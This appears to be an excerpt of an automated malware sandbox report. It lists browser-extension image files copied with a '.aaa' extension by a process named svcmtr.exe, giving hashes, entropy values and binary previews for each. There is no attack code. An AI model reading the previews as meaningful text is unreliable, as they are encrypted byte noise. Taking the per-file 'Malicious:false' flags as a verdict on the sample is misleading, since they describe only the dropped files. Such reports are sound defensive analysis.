                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....(..ytJ>0.T.6..N....B.w..4.5.....(5fw.Gk.w;....>..ub9..V....,R........Tk..`...%...d....H..NLf..X<.y..i=..vJ..(.:x..x...fd....R....w..&..7zc|?.X.x.?.s.k..TQ}.e.b.8..........UU...a........!A.}...eT.5.....i.#.s..o.........+....X....G......}%e..y%.B.C#1.......c../..CE..x..Zz.....Y.^x.9~..........f......D4~|.".(`G..D.....|..U,Z.y<m..V7r.%.....i.....(....[:..P`V~...~1Dg0d..V..<..$..?......J.W..0.)...R]a.k..sI<n..~v*.{m..9..mW..g....9.|#..S.w. ..%p9..G......DIj..{Q..N.LT......D....5...{..VI....!..h.IR=]...1.... A....0.o#.N...`rA..N...lC.G..FX..i....".czZ...'.hz.tc0....q..g

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.387367768699737
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S29A0ktlpQSYhpcw2v2byGGT8BimA:c+9U40oDgsTkLySYhSFv2bBa8B3A
                                                                                                                          MD5:89FF5C0CB9FD291991D6E6E93CE3555F
                                                                                                                          SHA1:39623AE94B632A6C10F8368888549B7891B050B2
                                                                                                                          SHA-256:60A49C41CC2650A024DF4E8DD295CF2C4AB285A2F4CF518CB4C65CE27BC7A5EA
                                                                                                                          SHA-512:0984D80150B557D24966BCAD0184A7299A96AD010AC3A732161EA3BF55270AD22D4D3F63205D785F2F15B4573B35C6A1BD719B8BA483BFEE87E422F3FF5B0841
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....~3.X..[9\....N...G.....O......3.Q.H1..j..P...BAb.....TLD....2....P*..+J..{.%.v.?...c.C..................R...`.....%.i.....=W...#...7..Z..W.i..\....3W..*.e.J.~.p...)..*.g..G.X.p..:Zg......^=.N...y.t..=a.....y.#.v.#.3.9...@.z..7...7S.....@.'....8..?[.P.z.Au.......*....u..V.DK..J....un.D.UBv..CL`.OM.p.e.[RT..H."...M..uj....&....T.[....,....f<...IP.... ..!.b.H...lk...E.f...VPV.......9x...gv...."..>*_..7..D}.q.!......Y>Rq...VE....5..6.OLND.H.z*..W+1..v............F..B2....+.?....P.=.%w...sZ./......oMp.).r....9...".....Q8ia ......M..e...u...4...XR.TW................JZVm%9%...

                                                                                                                          C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.473332774075749
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2uszlZSvQIyeY2QENraw2stMXo8Zx:c+9U40oDg9IIRQsawTkx
                                                                                                                          MD5:AA0B892421F843C22C0A3115BA165CFC
                                                                                                                          SHA1:CC196BEF1F5E6DF307D22797F5813E539FCB421A
                                                                                                                          SHA-256:1A276CF2A1900DB92DD97708F455B6A20F4B36FFE53788BFD0E6E52F63D12D57
                                                                                                                          SHA-512:BE2973607C8710302FFF86FC7CE1C81A47B67F1D54E1A7AE1ADFABBF25BB38A595B53BE9B63FB08CB687AB7B7B92012430F7909B49104C5E93793BC3E1E8A06F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......=....8Zd....N...x'...D..a...N.aO.......#...Gz:zP@S...D......Y..g....+.......h..*O....T......k...r....z]I.q..f.M.0x...,To..E...P....8...rL.q....rhJ.....r.....H......sLn.-...@.......;...A.t..i..Q..y.?..]*.....l.R..2/.&.w8Qv.G.....I....>..A.].{..f..bUSv.`..."O..i.c...e..?!. ..\.....U....tQM..?2_.k.f.....~...U.O...}....)....s...5..."..a.....j.l.f.'.H....`.;.t]....../....E^.{o.Q...E......0....,......"..5".h<..J.y4g;8.s...M-$........Z..h.Xs.;=...ejv..7>k>..2..k..;a.....R..C...z..:R.....t<.nn...6}............gD....}k@.j.).i.p.y.T......>C.X.....T..G..........K.i.....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-16.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.7076338004086065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgQkL2d+AjKqNcOob5ihE102JJUUCNg:cztoD0ARhfskg
                                                                                                                          MD5:4C80FCA02EE9674BD9CBBBD7C261E5BB
                                                                                                                          SHA1:BEE5CC500BD1C41D2867CD2A8E05D02222CFD694
                                                                                                                          SHA-256:6AAB0DE0F72A66A64FEE3CC801820A94AC3F1CBE3847DA985A663D941DF8AF41
                                                                                                                          SHA-512:23C346AA9CF2A07024D8D27008AD0B170E58D8FAC5166FD6E0DAE538B4428086685320F11B5BEEF5E120C471A86DB88F49F8181F68347C3A6822D5F2DDE2C020
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....W ..-.......=.....Z..H.!m.|e....ONHv.d^......3...z/.X..(..X.8)J.3,....-lr..=S..8..;..}%.C<^xH..lDk......'....c...I.].-..Cc.q...e..B.1fspI.N.....8l9u....ht.{.LO.W......p....e.j...E.*.}t.+..^.S\...uMH.....WYFwHa.F.Z.W.....z 3t..]....M"i...|.W..Y..l.I&..kh...m...Bc...Y....=i.0.k...WxW}...T.um.p..].x>.I..t..,......+..f..Vj.......1.'[..v..4....,..\.~....da....8.%.p].Rf?hy...#.N......U%h...p.qm....\.4.t...WWv...E...?.9j/..Hy$...ec.y1.....o'.............$..bbC..<#.W^."P.C...C...u...q..7....~...Y.y.Yy.b...n.r...<.v..&/IV....a.s.Y...RP..F>.._ ...(..MJ....{K;s..;..0.mH....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-16_active.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.690739959690895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2WxX5/T/DJs9kNo31rC97ObfchOofbcAuMQQGfx2dyfUA9J:c+9U40oDg9X1T/DJsyc+OwEWJRtwsdi7
                                                                                                                          MD5:438AC1B0C5AE02C847E187894FB92FA2
                                                                                                                          SHA1:8398861B7E137FBD65C8002E25AE8D4FBCC4AA32
                                                                                                                          SHA-256:7317593F09823A8F8A183E38DBA7A90FA3D01340C4FE52D50FF47100FAB36982
                                                                                                                          SHA-512:DB3C6BA861C4BA76D33DC932AB000BCD7F33509EE9A7104558EDBE9953B3C707010AA00696B70195705B0292426B6C840E0788653191EDE03C7645D1C6B9FBEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..Y.r*....YD...G....K.y(... .....D...".?.?.U=In.FA.....:SI.....7..n.......n....X-;f..LH.\...R.2g...K..g...:...[0s.nr...X{1?o..0.U.Y.....*.P.....*..H..._....w..{.h...\yB~5.B.....jb~?.#H=....k.8=.".l.*R.......K..\..\.>N...q....N..KVB....:.Q..7,.........o.r......^1...=~...":tiO......#.%H.......O.L.P.2.,.....fZ7......s>nE9.-tn.2..k......a.Wg"A?.]p.........TI......]!B..ft.....&~....{h..%.<5........cE...!....uS.?.K4. ..F...G-.)..9 .d).......`.....V}.=....K..:.....)v.....c.T..].\...W.Y...........F0mE@.......s...X.S..G..)o.?.s.YQ.......B.|.w...M..U..R{..]f3..~...1..)....y.Lz0n.rl...

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-32.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1902
                                                                                                                          Entropy (8bit):7.762082222377723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5Y96OL6bxq3aLQGVnkhkqKKDBl1ZSXbAN:cztoD39L6MaQynkhkIBl1ELO
                                                                                                                          MD5:FA5027966A03F348427D6993DB4B60B5
                                                                                                                          SHA1:C8B109F7048DF8442108676E940D2A22DA726030
                                                                                                                          SHA-256:039770AC0678E7D893CFE523CBA009AEEFE5943A1D2ED44B0650445C8D0CC996
                                                                                                                          SHA-512:7D51C6F26F417956DBE5F0E448E07EF81D73DC641143C971FAB32FE981ACB1375F92FE0B977BD237C2A5245A163B9AFDA016246E92C0E31DA43DC7270AE5BDD1
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......yM......-.........{.A{ .3.TZ..kD..N..n...H$.$...+B...3..nu.u.>.r#...\..v)p..U......Z(gE,...G..;.wz~..;.`.Q..a..O.....i..,T.m..~.....v...s...*._(....}..m./...........h.........5..=...A....~....@...-..........%z.M..'.<r.l6..@z.M.L{55....P.p..Q...Q...s.....J5|}...kQ....|..~H...AK6.....i..p;........c.+../..i.n..}t..h.+..w..m...Xa..K...a...J...`.{K>... ...E|6/\!..n:...x..2.r...G...(9.&......]_.8.".f....J{..G.ZL...#...A>.|.p.NS*-l.JEU...A.......t.....8W.C.S...S...(..Y.BE@.....'a..'.W&.......!t.EC3..@..v8.>u.Plh.a.K.T........C...p$.=.=.w...."+.\.g...^.nBC.e...YI}..cB.....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-32_active.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1870
                                                                                                                          Entropy (8bit):7.756211554675807
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg5o0nkE15SXcoCvvmBKMuN+qkf1CdeQK/qppKr7iy:cztoDcGErSXuvS8N+Ff1C0SKOy
                                                                                                                          MD5:C928067616207C9C9A489BB971559C28
                                                                                                                          SHA1:6212693065F64D854E7177BBED93B13FE7E5FE39
                                                                                                                          SHA-256:6C99EB3FD60C8335E6E96C3BAFF731300597DD6497855D687201CE23E7391126
                                                                                                                          SHA-512:14A00C1558773DA6CA323A86CFBB895653299DFE04AB10E68C97B9555BDF7E3CBAC05EBCD74CE0336ACE5B3D008665C7B253F0472EB0A36D328D13D055DE2DB0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......xiZISG.x...u.....8.(.Y.P=.N.5\..?..7"......K.6..Q...=..+I.8+....\RU..mVF.....d.n.PGt.j.g......u/._cV...[Y..28,...J......R.(7@....|VN.D..O:A..G.h.S..8.1........~S..<.rO.?..!..!..+...r.O...-..5$....q.../.g..Y..Q......LL...O[So.M....).......k.-..Y.U@.w...E...U....2D%.Y...a.....~S...C...bgOj...|R...w|]U...I..-B{...3.pP.0.^..U...4...`L.ze. lGmW....G.B.......c[.....rp..........d..k..u..U.5.+*...80.|}OR,....KO~s?..M.....Y._;...k.q...B.E..m...b..]$L..Q.?w.~..9W..E,........,.m.L.$y..4.C...'i..',.R.|.x.=SE..L.....Sl....%.D..@...@+E.&^~@E1} ....`...+..l^..;...LH...@.q...b.C`

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-64.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2446
                                                                                                                          Entropy (8bit):7.8246035609718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgZfFnM8IpTeH9OkZEGf3tcnK8fJDBSIsU6sjx8NApe:cztoDq1M8GY1ZRZYDBSIs1sOK8
                                                                                                                          MD5:EAB0670927FCD5F822B21D8E09AB039B
                                                                                                                          SHA1:4B96AFCF87DC50901A57853B5822B9187CE8F600
                                                                                                                          SHA-256:4210D1C4F62662725D25D9FEA37140AEFA2EE6849B4D2A5C4E04192FE45AE19B
                                                                                                                          SHA-512:9772618503549A98D51002A6E3C3B91F7C0969B929A51606EB05A2C11402096B06D10123315EC4F09698F57F1D22894F089F0FE607D5D2F61F929B240D360AF4
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...4......'...5.......<...<.:."..o...n.."..c?...g..\..6G.R.J}Z.5....:...9.A..o..x.^#3....Et...py......E.|....w=F.(.G.h.>.rw..iH.&o^.#.Iyf_.....F..<W8...8Z.P........h.:e/.....U.R..."....<.~..H......i{.7.I..q..)(k.[.elW..*..E...v..J|..aQ..P..,.........R.+.,.F....7Y?.K9!..i.g"..N..R...g...e.0V..|\"8...r.J..t.Ggd.....N.I)sCw...\.......^/.0.V..,.Tw-Iv.\..s..../k......lm.gLL..E5...W..d&....+.T......3.<...+..D..........@:.i...;...C..V.X.-1.j.e...-.~V.Lu.....uw.....f..e.!.6t.w+..:..WC.L..0..."AQ...l...h.DG..n.T.......F.......L.<.<S$..........8.R.1.W*_.....E.g.r....t..c..BUS

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-64_active.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2382
                                                                                                                          Entropy (8bit):7.824190227074992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgjKxnu9Wwk6dfGoOxDCDRpqp1gUZzpZb3UIY1m63W8:cztoDhFwlFOG+pNzv3a1HG8
                                                                                                                          MD5:004373613EFF96FBC1713A9A3DDA33A3
                                                                                                                          SHA1:138E6AA14A75B339D826EE366E13576EDF556810
                                                                                                                          SHA-256:629A1AA60ACF65814085C430132EB59F508E2412BFB523FEA2DAC15E57C14262
                                                                                                                          SHA-512:355698BC33EEFBAC55B0D76DF534F70940EC7BC167BA40B57B387C1DA8DBA5F1F56B2F199BC85EEEBF8A515431494F49F7917278237CEEE01F0DE3335A27B415
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....N~..;N.4.}........d.l...5F..>m..{....w.(...k..A/.....r.....l.......q..4...u}Cc.'.b....2.u.[.i5.....g...qi..J...Ic@.d......H:*.f....H.!.U.a....X2..I.yk.u..<.p........... ..5q.r.w.G...w1...A.P..3.....Ql}...|R...Z....s..ef..Z..?..-...Jw....y."h....e..z..........}. ..Ku.x.....J..U.ri..276.........q..3..lP)........ER..SQ.yX._..#.c.Q.F\k......M...)z>.......~..!.\.......).\.n...dn........|.*...w.C.?...P+...gq.%f./t.FG...Z&9A.=(P..!.......RG.4.......c]:z_.C0Y.%.-f...i{`-$X.`W...)....N./..k.....b.P%..[..S.HN.-.O#..% .0...f3".4..7x........\..P..k.W#..`ax.S#$..H.x...d.$'.<..6.n...pkx.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\notification-icon.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1822
                                                                                                                          Entropy (8bit):7.754150731458982
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDg73g1u6CYvwaRLbIOZOhxWd1y7iuEiUI:cztoDM3g12gFbImSgd17bI
                                                                                                                          MD5:EFAE0683B6F5A11BDDB2B11A6C05146B
                                                                                                                          SHA1:7A5E74032B09548C8E75D80C672F3CBF1FB7F5E5
                                                                                                                          SHA-256:D7AC49D1902A7C3480DD144B65250FAFCFE4EEAAEA6BF88CE0D6F919C3B617B2
                                                                                                                          SHA-512:30D87D2A0A2C08E4F9677963BCB538602AE3891902893A94B08873C470C2A29E0E2D5E5C3C9371D05281F10C218E744EAA50A8BB6B4B83DFF94EE53FDD97D882
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....6&..e.J...1>.w....3.'..n..4..=.....m.*W......DP;....)sY.....Q._....W.:..[..i.&K..."+L.-...NA_......UN.^.B.xI*C.Q..It..k/..U74Y...f9......2..j..&.rt.....M.H.{...u...:..[+/xb?@..Ma..F!L....x......].(.o2.0.~..b.....|..B. ...G.......r..\.{!J..kxBF.R.u.T.$l...(J...F..1.....B...a...)......6....~.R...d....OZ.k}.r....Q../jvF......|..K...[H.8...~.}&.2p.$O.m1..W7...`.".(~.\.yB.....U..T.....j....r)....Yg....U..N@XD.>L...g.../,+(.........../g....VJ.Q. ~.f...4..{Y.m.+h.. @..L<\.B.U .W.2....c.B...mS.JT.7[IR].&....)y.../EOjK.hb..@5"..].V8..u..r.5.A......M.+...h...m....r.<..\.K.F..U...\

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star1.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1182
                                                                                                                          Entropy (8bit):7.547721194304397
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2JMwwRCi47yXNKu+NGBaq4JJ5pTwVN/c+:c+9U40oDgwMRR31XNxIGBloJX8k+
                                                                                                                          MD5:23EDF58672017B7B9688D4D23289351A
                                                                                                                          SHA1:0C0DED5FE88526EAA7D8F2DE0DA50DAED02075EC
                                                                                                                          SHA-256:D659AA9BF54612D79168F4F0C28D10BD81869017608773292A632A681A82ABB4
                                                                                                                          SHA-512:4165FBE66C3D02467B6A139E5D700801977924BA58D549E3F8642B0EED22FC5BF6D4C3C44181F168C374613E18C4A01B78C0C67EF7446DB2A65008E66DEDF925
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..*5U.\\......EO.S.....0.g.....n=.!..X..2.Z...u..m......S9.....Y.7"....+....D..V...#..c.@Zn..D..%Gr;. V`...m..C..{...Z......+$]....7.9.I......~P#.Y...G...D.0...-.....^@..L.3S?1..W.p.F..........I.3.,....Zq....)........b.-.jW..}..E..l... ..m...{..u.J..[d..8........j.FFUC.a(.>.k{.G.../...#..(.:..P..'..%.v;8.U.9..6 ..@.v."v...zM.9..-*y..|..ya8&......XRT.Q..Qc%.1.}zPQ9.U.e.../.X^. ..a.`...2w.X..Dr..A.U...N..K..h.....1...e..&.G.i....{PB..3)..N-I.1...`[.L>...cg.'....f'^.j....E......5..|.....'a...q.~acp.t|.(.......+.U..zE.....@a..OR...........^..B..I5b.....u..X..%/....z%p. ...

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star2.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1566
                                                                                                                          Entropy (8bit):7.6972077428042915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgrp46tjKirvCUSX6y+fkGbSXRPRtzyE:cztoDwu6llCV6CbVRZz
                                                                                                                          MD5:605B29A01C5145D64487F502D7925CCF
                                                                                                                          SHA1:07E09624840A1207DA532E9C4A949B08DCC39955
                                                                                                                          SHA-256:CB3F906B0234F1FBA4FC84F2A8DAC6D418452D440C27C22692E228A46B4AC344
                                                                                                                          SHA-512:6F5711AD7DD7F93E3EE6CE39229EB2863B5ACE75542C607819DD35C78F997D4F12AE846202FFE1F436079B01F862416174F7351CCC99734EEEDA7718554FD018
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...z.C...0:_...g>~p...q..E/q_C...I.k...Lu..6w3.8.V~h.^>1'n\...R.z,..l...r......(P.y......3....,.."j}..ZHs.....$fZ.j1.Q...OQs......Q.....I{(..i.U........@ ...,H\...O=wJ..K'...3D.w........p}t...+.....Cx&x.5.N..K.8.M0'BX..#..UQF_.V...'...,..5.......G..u.&......t..h}Dn..*..2...~b...@...?...O..w.."....WF..-./T%R.Y)..So...M...=..W.....p.s......au.e..A.S.Z.y.x(.5.M........m.../L...J..7..B.w.y.....Y.....o2&.......3 H.h./H.x.....>..VY..P]>"oY.H~5.|.8,....a....Hf...)...3zI........:.=...aD.y.s...g..9.I!.>.z..?.&..a.N{.....a..+.._.p.9...u......-~...#...l...ff.]>".....x?...V.{...rd.}.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\progress\star3.svg.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1694
                                                                                                                          Entropy (8bit):7.703343097095299
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2cpO7qHyH4fYD7AuuTFEQOzYRgAhsFRvGaJO2n38E:c+9U40oDgfpsFuYD76mBmRgr3p
                                                                                                                          MD5:4A4514FB43670EE7C66ED40411DEC5A0
                                                                                                                          SHA1:12D1FE3EFEE19BF6765C0302124DDBABA1D22E47
                                                                                                                          SHA-256:2535E4F9A1DBEC5E209A3018F5496FC175D5E0DC0E69FE2E38979B4F9448C738
                                                                                                                          SHA-512:F69BC749CD8E72829E54B4D353B2AFD5D36BBCFA79A7ADD3E171C0C0B4EA2F7BACA0D2B3BE707BE782C43485F3CD5B06DBA997038A2EBE27AB335948298AD772
                                                                                                                          Malicious:false
